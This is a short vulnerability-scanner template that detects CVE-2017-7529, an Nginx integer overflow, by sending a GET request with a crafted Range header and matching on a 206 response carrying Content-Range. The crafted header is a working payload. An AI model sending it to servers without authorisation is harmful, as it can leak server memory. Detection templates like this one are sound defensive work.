id: CVE-2017-7529
info:
  name: Nginx Remote Integer Overflow
  risk: Medium

params:
  - root: '{{.BaseURL}}'

variables:
requests:
  - method: GET
    url: >-
      {{.root}}/
    headers:
      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
      - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      - Range: bytes=-17208,-9223372036854758792

    detections:
      - >-
        StatusCode() == 206 && StringSearch("resHeaders", "Server: nginx") && StringSearch("resBody", "Content-Range")
references:
  - https://www.cvebase.com/cve/2017/7529